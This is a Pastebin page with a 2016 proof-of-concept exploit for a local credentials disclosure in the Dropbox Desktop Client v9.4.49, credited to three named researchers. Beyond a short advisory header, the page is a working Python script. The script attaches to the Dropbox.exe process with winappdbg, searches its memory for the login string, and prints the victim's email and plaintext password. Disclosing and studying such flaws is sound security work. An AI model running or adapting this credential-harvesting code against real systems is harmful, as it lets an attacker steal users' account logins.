Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #####
- # Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure
- # Tested on Windows Windows Server 2012 R2 64bit, English
- # Vendor Homepage @ https://www.dropbox.com
- # Date 06/09/2016
- # Bug Discovery by:
- #
- # Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
- # http://www.black-rose.ml
- #
- # Viktor Minin (https://www.linkedin.com/in/MininViktor)
- # https://1-33-7.com/
- #
- # Alexander Korznikov (https://www.linkedin.com/in/nopernik)
- # http://korznikov.com/
- #
- #####
- # Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
- # A potential attacker could reveal the supplied username and password in order to gain access to account.
- #####
- # Proof-Of-Concept Code:
- import time
- import urllib
- from winappdbg import Debug, Process
- username = ''
- password = ''
- found = 0
- filename = "Dropbox.exe"
- process_pid = 0
- memory_dump = []
- debug = Debug()
- try:
- print "[~] Searching for pid by process name '%s'.." % (filename)
- time.sleep(1)
- debug.system.scan_processes()
- for (process, process_name) in debug.system.find_processes_by_filename(filename):
- process_pid = process.get_pid()
- if process_pid is not 0:
- print "[+] Found process with pid #%d" % (process_pid)
- time.sleep(1)
- print "[~] Trying to read memory for pid #%d" % (process_pid)
- process = Process(process_pid)
- for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'):
- memory_dump.append(process.read(address,100))
- for i in range(len(memory_dump)):
- email_addr = memory_dump[i].split('email=')[1]
- tmp_passwd = memory_dump[i].split('password=')[1]
- username = email_addr.split('\x00')[0]
- password = tmp_passwd.split('&is_sso_link=')[0]
- if username != '' and password !='':
- found = 1
- print "[+] Credentials found!\r\n----------------------------------------"
- print "[+] Username: %s" % urllib.unquote_plus(username)
- print "[+] Password: %s" % password
- if found == 0:
- print "[-] Credentials not found! Make sure the client is connected."
- else:
- print "[-] No process found with name '%s'." % (filename)
- debug.loop()
- finally:
- debug.stop()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement